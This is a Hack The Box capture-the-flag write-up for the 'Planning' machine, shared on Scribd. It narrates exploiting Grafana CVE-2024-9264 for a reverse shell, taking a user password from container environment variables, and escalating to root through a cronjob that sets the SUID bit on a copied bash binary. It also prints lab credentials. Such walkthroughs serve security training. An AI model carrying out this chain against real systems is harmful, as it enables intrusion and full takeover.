Scribd
Upload
7K views11 pages

Planning HTB

The Nmap scan identifies open ports for OpenSSH and nginx, leading to the discovery of a subdomain for Grafana. Exploiting a known vulnerability in Grafana allows access to the user 'enzo', whose password is revealed, enabling SSH access. The user then escalates privileges to root by creating a cronjob that sets the SUID bit on a bash binary, ultimately gaining root access.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
7K views11 pages

Planning HTB

The Nmap scan identifies open ports for OpenSSH and nginx, leading to the discovery of a subdomain for Grafana. Exploiting a known vulnerability in Grafana allows access to the user 'enzo', whose password is revealed, enabling SSH access. The user then escalates privileges to root by creating a cronjob that sets the SUID bit on a bash binary, ultimately gaining root access.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

Nmap output

The scan reveals:

Port 22: OpenSSH 9.6p1

Port 80: nginx 1.24.0

The web server redirects to http://planning.htb. I add this domain to my


/etc/hosts file.

Subdomain Enumeration
Further exploration of the website with ffuf uncovers a subdomain
grafana.planning.htb. After adding this subdomain to /etc/hosts file, I login the
Grafana instance with the credentials provided in the scenario.
Subdomain discovery with ffuf

admin / 0D5oT70Fq13EvB5r

Grafana Exploitation
Checking the Grafana version reveals it’s running version 11.0.0, which is known to
have arbitrary file read and Remote Code Execution vulnerability (CVE-2024–9264).
You can find a Github code to exploit this vulnerability.
CVE-2024–9264

Exploit in the Github

First, I create a basic reverse shell, and then serve it using python http server.
Before using the exploit found in the Github, I start listening the port that I specified
in the reverse shell, which is 1337.
rev.sh

http server with pyhton


Exploit the vulnerability using the Github code

Listening the specified port with netcat

Now I get a shell inside the Grafana Docker container. Inside the container, env
reveals the password of the user “enzo”.
enzo user password

I use the password to make ssh connection to the host with enzo user. After gaining
ssh access, I find the user.txt in the /home/enzo folder.

ssh with enzo user

Privilege Escalation to the Root User


After gaining access to the enzo user, I look for a way to make a privilege escalation
to the root user. First, I check for the scheduled tasks in the crontab.db file. Inside
that file, I find the root password to login into the cronjobs dashboard. Then, I
discover that the cronjobs dashboard is running locally on port 8000.

crontab.db file
Local ports

So, I make ssh local port forwarding to port 8000. After that, I go to
http://127.0.0.1:8000, and login into the cronjobs dashboard with the password that I
found in the crontab.db file above.

ssh local port forwarding

Login with the credentials : root / P4ssw0rdS0pRi0T3c


Cronjobs dashboard

Now I am on the last step, which is to create a new cronjob to escalate to the root
user. First, I create a cronjob that copies /bin/bash binary under the tmp folder, and
then set the SUID bit on the copied bash binary to escalate privileges.
New cronjob
Finally, I go to the /tmp folder and list the files under it. I see the bash binary
created there. I run the binary, and get the root user. Boom!

Root shell

You might also like